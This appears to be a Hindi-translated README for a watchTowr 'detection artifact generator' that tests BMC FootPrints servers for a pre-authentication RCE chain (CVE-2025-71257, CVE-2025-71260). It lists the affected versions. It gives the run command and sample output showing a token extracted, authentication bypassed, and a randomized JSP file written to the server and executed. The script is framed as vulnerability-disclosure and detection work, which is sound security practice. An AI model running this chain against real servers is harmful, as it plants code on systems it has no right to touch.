
पूर्व-प्रमाणित RCE श्रृंखला (CVE-2025-71257, CVE-2025-71260) के लिए BMC FootPrints इंस्टेंस का सत्यापन करने वाला डिटेक्शन आर्टिफैक्ट जनरेटर, जो प्रमाणीकरण को दरकिनार करके और सिस्टम जानकारी को सूचीबद्ध करने के लिए एक JSP फ़ाइल लिखकर काम करता है।
BMC FootPrints पूर्व-प्रमाणीकृत रिमोट कोड निष्पादन श्रृंखला पहचान कलाकृति जनरेटर उपकरण
यह डिटेक्शन आर्टिफैक्ट जनरेटर जांचता है कि क्या BMC FootPrints इंस्टेंस CVE-2025-71257 और CVE-2025-71260 के प्रति कमजोर है।
डिटेक्शन आर्टिफैक्ट जनरेटर दो संचालन करने का प्रयास करता है:
कमजोर उदाहरण के विरुद्ध परीक्षण:
python3 watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py http://192.168.2.2
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py
(*) BMC Footprints Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-71257, CVE-2025-71260]
============================================================
Detection Artifact Generator Tool
============================================================
Target: http://192.168.2.2
[+] Making first request to: http://192.168.2.2/footprints/servicedesk/passwordreset/request/
[+] Successfully extracted SEC_TOKEN: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Making second request to: http://192.168.2.2footprints/servicedesk/aspnetconfig
[+] Using token: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Using randomized JSP name: MNdeu12Wf
[+] Making third request to: http://192.168.2.2/MNdeu12Wf.jsp (randomized artifact)
==================================================
EXTRACTED INFORMATION:
==================================================
Username: LOCAL SERVICE
Working Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0
==================================================
[+] Detection Artifact Generator Completed!
BMC FootPrints: 20.20.02 से 20.24.01.001 तक
20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, 20.24.01
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें